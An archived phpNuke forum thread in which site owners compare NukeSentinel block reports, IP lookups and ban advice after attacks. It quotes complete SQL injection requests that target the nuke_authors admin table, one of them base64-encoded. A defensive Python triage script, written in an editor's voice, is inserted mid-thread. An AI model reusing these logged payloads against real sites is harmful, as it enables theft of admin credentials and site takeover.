Ravens PHP Scripts: Forums
Ravens PHP Scripts And Web Hosting Forum Index -> phpnuke 7.4

Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
Posted: Tue Jun 07, 2005 11:08 pm

mds, thanks! And keep in mind there's a good chance that he spoofed the IP, but I always send the reports in anyway.

hitwalker
Sells PC To Pay For Divorce
Posts: 5661
Posted: Wed Jun 08, 2005 3:28 am

Well, it all depends on what kind of connection he has, dynamic or static..
And believe me... if they are good enough to hack your site, they won't be stupid enough to use their own IP.

A good step is to set the proxy blocker to on.
But it also has consequences...

mds
Client
Joined: Dec 24, 2004
Posts: 194
Location: Michigan
Posted: Wed Jun 08, 2005 10:14 am

Raven wrote:
mds, thanks! And keep in mind there's a good chance that he spoofed the IP, but I always send the reports in anyway.

Right, I thought of this as well..

hitwalker wrote:
Well, it all depends on what kind of connection he has, dynamic or static..
And believe me... if they are good enough to hack your site, they won't be stupid enough to use their own IP.
A good step is to set the proxy blocker to on.
But it also has consequences...

Can you give me an example of the consequences?

Also, I know it's off topic from the rest of the thread, but as of bbtonuke version 2.0.13 or so, wasn't the update supposed to take the forum version out of the footer / copyright area? Mine still shows... 2.0.14....

hitwalker
Posted: Wed Jun 08, 2005 10:42 am

Well, some people without any bad things in mind use a proxy, or it's simply their provider...
As for turning the proxy blocker on, it will result in banning the person or redirecting them.

mds
Posted: Wed Jun 08, 2005 11:06 am

OK, will adding the IP to the protected list cure this?

hitwalker
Posted: Wed Jun 08, 2005 12:01 pm

Probably... I'm not 100 percent sure...
At least you can try....

64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1164
Posted: Wed Jun 08, 2005 12:16 pm

No! You don't want to add the IP to the protected list, you want to add it to the banned list.

_________________
Steph Benoit
100% Section 508 and W3C HTML5 and CSS Compliant (Truly) Code, because I love compliance.

hitwalker
Posted: Wed Jun 08, 2005 1:32 pm

Yeah, something like that...
I think it's the sun..

mds
Posted: Wed Jun 08, 2005 3:12 pm

64bitguy wrote:
No! You don't want to add the IP to the protected list, you want to add it to the banned list.

lol, no, not the IP of the hacker of course, that one goes to the ban list.

The IP if a person is blocked because of Sentinel proxy protection.

TheLoneInventor
New Member
Joined: Jun 06, 2005
Posts: 7
Location: Oregon, USA
Posted: Thu Jun 09, 2005 2:22 am

No problem. Yea, after finding that IP I was aware of being visited frequently in the past by the same guy... Doh! Had I only known... lol

Oh well, live and learn I guess.

EDIT: Oops, missed this second page! lol Yea, the IP could easily be spoofed, although I have received about 50 hits on my banned page redirect setup from those IPs already, so...

_________________
Invention Makes the World Go Around in New and Better Ways! Visit me at www.loneinventor.com

Last edited by TheLoneInventor on Thu Jun 09, 2005 1:33 pm; edited 1 time in total

mds
Posted: Thu Jun 09, 2005 9:59 am

I agree, but thanks to Raven we have a resource of very knowledgeable people who can help us.

mds
Posted: Sat Jun 11, 2005 9:28 am

Well, it looks like they tried to hack again. Here's the email and the IP lookup info; this time they were caught and blocked:

Date & Time: 2005-06-10 12:08:50 PDT GMT -0700
Blocked IP: 81.215.140.100
User ID: Anonymous (1)
Reason: Abuse-Author
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Query String: www.XX.com/admin.php
Get String: www.XX.com/admin.php
Post String:
www.XXX.com/admin.php?admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=mod_authors&Submit=Display
Forwarded For: none

Client IP: none
Remote Address: 81.215.140.100
Remote Port: 1229
Request Method: POST

Location: Turkey (high)

% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Note: the default output of the RIPE Whois server
% is changed. Your tools may need to be adjusted. See
% http://www.ripe.net/db/news/abuse-proposal-20050331.html
% for more details.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Information related to '81.215.128.0 - 81.215.143.255'

inetnum: 81.215.128.0 - 81.215.143.255
netname: TurkTelekom
descr: ADSL-MET-Acibadem-Dynamic Pool
country: tr
admin-c: TTBA1-RIPE
tech-c: TTBA1-RIPE
status: ASSIGNED PA
mnt-by: as9121-mnt
notify: ***@turktelekom.com.tr
changed: ***@turktelekom.com.tr 20050425
source: RIPE

role: TT Administrative Contact Role
address: Turk Telekom
address: Bilisim Aglari Dairesi
address: Aydinlikevler
address: 06103 ANKARA
phone: +90 312 313 1950
fax-no: +90 312 313 1949
e-mail: *****@ttnet.net.tr
admin-c: BADB3-RIPE
tech-c: ZA66-RIPE
tech-c: ZA196-RIPE
tech-c: LA109-RIPE
tech-c: NO638-RIPE
nic-hdl: TTBA1-RIPE
notify: ***@turktelekom.com.tr
mnt-by: AS9121-MNT
changed: ***@telekom.gov.tr 20000608
changed: ***@telekom.gov.tr 20001020
changed: ***@telekom.gov.tr 20010615
changed: ***@turktelekom.com.tr 20040903
source: RIPE

% Information related to '81.215.128.0/17AS9121'

route: 81.215.128.0/17
descr: TurkTelecom
origin: AS9121
mnt-by: AS9121-MNT
changed: ***@turktelekom.com.tr 20040927
source: RIPE

mds
Posted: Sun Jun 12, 2005 10:03 am

And they tried again:

Date & Time: 2005-06-12 02:44:31 PDT GMT -0700
Blocked IP: 85.96.71.187
User ID: Anonymous (1)
Reason: Abuse-Union
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)
Query String:
www.xx.com//modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND
pm.privmsgs_type=-99 UNION SELECT
aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
FROM nuke_authors WHERE radminsuper=1 LIMIT 1/*
Get String:
www.xx.com//modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND
pm.privmsgs_type=-99 UNION SELECT
aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
FROM nuke_authors WHERE radminsuper=1 LIMIT 1/*
Post String: www.xx.com//modules.php
Forwarded For: none
Client IP: none
Remote Address: 85.96.71.187
Remote Port: 3061
Request Method: GET
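The two block reports quoted above record the same kind of request: a UNION SELECT aimed at the nuke_authors table, once hidden inside the base64-encoded admin parameter sent to admin.php and once in plain text in the Private_Messages query string. The Python below is an added example, not code from this thread, from phpNuke or from NukeSentinel: it parses reports laid out like the ones quoted here (the two sample reports are constructed from those quotes, with the long list of nulls shortened), decodes the admin value, and labels the injection indicators found in each request field, so a site owner can triage such e-mails before deciding which IPs to ban. The indicator labels, the field handling and all helper names are my own; the only assumption taken from phpNuke is that the admin parameter carries a base64-encoded value.

```python
"""Triage NukeSentinel-style block reports for SQL injection indicators.
Added example: not code from the thread, from phpNuke or from NukeSentinel.
The field layout mirrors the 'Blocked IP' e-mails quoted in the thread; both
sample reports are constructed from those quotes (the null list is shortened)."""
import base64
import binascii
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample: the first report quoted in the thread (admin.php, POST).
REPORT_ADMIN = """\
Date & Time: 2005-06-10 12:08:50 PDT GMT -0700
Blocked IP: 81.215.140.100
Reason: Abuse-Author
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Query String: www.XX.com/admin.php
Post String:
www.XXX.com/admin.php?admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=mod_authors&Submit=Display
Remote Address: 81.215.140.100
Request Method: POST
"""

# Constructed sample: the second report (Private_Messages, GET), keeping the line wrapping of the e-mail.
REPORT_UNION = """\
Date & Time: 2005-06-12 02:44:31 PDT GMT -0700
Blocked IP: 85.96.71.187
Reason: Abuse-Union
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
FunWebProducts)
Query String:
www.xx.com//modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND
pm.privmsgs_type=-99 UNION SELECT
aid,null,pwd,null,null,null,null,null
FROM nuke_authors WHERE radminsuper=1 LIMIT 1/*
Post String: www.xx.com//modules.php
Remote Address: 85.96.71.187
Request Method: GET
"""

# (label, pattern) pairs checked against each URL-decoded request string.
SQLI_INDICATORS = [
    ("union-select", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("comment-truncation", re.compile(r"/\*")),                 # '/*' discards the rest of the query
    ("authors-table", re.compile(r"\bnuke_authors\b", re.I)),   # phpNuke admin credentials table
    ("superadmin-flag", re.compile(r"\bradminsuper\b", re.I)),  # phpNuke super-admin column
]

def parse_report(text):
    """Split a report into {field: value}; a line without a 'Field:' prefix continues the previous field."""
    fields, current = {}, None
    for line in text.splitlines():
        line = line.rstrip()
        if not line or line.startswith("---"):
            continue
        m = re.match(r"^([A-Z][A-Za-z &]+):\s*(.*)$", line)
        if m:
            current = m.group(1)
            fields[current] = m.group(2)
        elif current is not None:
            fields[current] = (fields[current] + " " + line.strip()).strip()
    return fields

def decode_admin_param(url):
    """Return phpNuke's base64-encoded 'admin' parameter decoded, or None if absent or undecodable."""
    query = urlsplit(url if "://" in url else "http://" + url).query
    values = parse_qs(query, keep_blank_values=True).get("admin")
    if not values:
        return None
    raw = values[0].replace(" ", "+")  # a literal '+' in base64 becomes a space after form decoding
    raw += "=" * (-len(raw) % 4)       # restore padding stripped from the value
    try:
        return base64.b64decode(raw, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None

def analyse_report(text):
    """Summarise one report: who was blocked, how, and which request fields carry injection indicators."""
    fields = parse_report(text)
    findings = {}
    for name in ("Query String", "Get String", "Post String"):
        value = fields.get(name, "")
        if not value or value.lower() == "none":
            continue
        hits = [label for label, rx in SQLI_INDICATORS if rx.search(unquote_plus(value))]
        admin = decode_admin_param(value)  # the payload may sit inside the encoded admin value
        if admin is not None:
            hits += ["admin-param:" + label for label, rx in SQLI_INDICATORS if rx.search(admin)]
        if hits:
            findings[name] = {"indicators": hits, "decoded_admin": admin}
    return {"blocked_ip": fields.get("Blocked IP"), "reason": fields.get("Reason"),
            "method": fields.get("Request Method"), "findings": findings}

if __name__ == "__main__":
    for report in (REPORT_ADMIN, REPORT_UNION):
        print(analyse_report(report))
```

Run stand-alone it prints one summary per report; the first one shows that the admin.php request carries nothing suspicious in plain text and that the payload only appears once the admin value is base64-decoded, which is why a filter that looks at the raw URL alone would let it through.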
 

christianb
Worker
Joined: Nov 24, 2004
Posts: 131
Location: Batesville, AR
Posted: Wed Jun 15, 2005 1:11 pm

TheLoneInventor wrote:
65.19.134.2 - is the one I believe was used to hack the site, through the forums by the look of it. 2608 URLs were hit by this IP from the kralkayra username.

That IP is familiar...
65.19.169.235 was used on my site

Code:
IP Address     Last Viewed           Hits
65.19.169.235  2005-05-27 @ 01:59:10 2169

all pretty much within an hour's time.
 

Susann
Moderator
Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support
Posted: Thu Jun 23, 2005 7:30 am

65.19.169.235 OmniExplorer_Bot/1.07 (+http://www.omni-explorer.com) Internet Categorizer is one of the bad bots; it doesn't read robots.txt, uses different IPs, and I also heard about different User Agent strings.

VinDSL
Life Cycles Becoming CPU Cycles
Joined: Jul 11, 2004
Posts: 614
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com
Posted: Thu Jun 23, 2005 12:12 pm

Off topic... I caught Iranians trying to hack my site this morning.

They were trying to breach admin.php with a SQL exploit on an ODP (Open Directory Project) module I'm developing.

If you're in a 'banning' mood, here's their URL: 217.219.194.163

If you'd like to send 'em an E-card, their addy is spynet.com@gmail.com ROTFL

_________________
.:: "The further in you go, the bigger it gets!" ::.

onnig
Hangin' Around
Joined: Jun 15, 2006
Posts: 36
Posted: Tue Feb 10, 2009 4:37 pm

I just got hit Feb 5th and had to recreate the actual authors table; the whole table was gone. Gonna look at the logs. Here are the user account details, different from the other thread:

User Name maxhex
User Email maxhex911@hotmail.com
User RegDate February 05, 2009 12:13:52 PM
UserIP-Port-MX 62.120.67.228:9049
Activation Link http://xxxx.com/modules.php?name=Your_Account&op=activate&username=maxhex&check_num=xxxx

Another IP logged: 65.55.209.69, turns out to be Microsoft, spoofed?

Susann
Posted: Tue Feb 10, 2009 5:22 pm

No, this is http://whois.domaintools.com/65.55.209.69

Maxhex is a new young Arabic player, I believe.

Do you have your own server?

Is your Sentinel up-to-date?

This is just such an old thread.

Sentinel 2.2.0 is history.

onnig
Posted: Tue Feb 10, 2009 5:54 pm

Susann wrote:
No, this is http://whois.domaintools.com/65.55.209.69
Maxhex is a new young Arabic player, I believe.
Do you have your own server?
Is your Sentinel up-to-date?
This is just such an old thread.
Sentinel 2.2.0 is history.

Hi,

I have a shared server, Sentinel is 2.6.01.

Raven
Posted: Tue Feb 10, 2009 6:12 pm

Onnig, please do not double post. I am locking your duplicate post from http://www.ravenphpscripts.com/modules.php?name=Forums&file=viewtopic&p=131229#131229

onnig
Posted: Tue Feb 10, 2009 6:40 pm

Raven wrote:
Onnig, please do not double post. I am locking your duplicate post from http://www.ravenphpscripts.com/modules.php?name=Forums&file=viewtopic&p=131229#131229

OK, sorry about that.

Susann
Posted: Wed Feb 11, 2009 3:31 am

Onnig, did you already find out how they got in, to prevent this in the future?
I somehow have a feeling it's not the standard way, and therefore you will possibly need to ask your host as well.

onnig
Posted: Wed Feb 11, 2009 10:12 am

I was checking my logs and that maxhex guy was doing a lot of the password recovery requests. I couldn't find anything else in my logs. Is there a known vulnerability?

Susann
Posted: Wed Feb 11, 2009 5:01 pm

Maybe send your log, or the relevant parts, to Evaders,
so he can take a look and you don't need to post more info here.

onnig
Posted: Wed Feb 11, 2009 5:11 pm

Through private messaging?
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours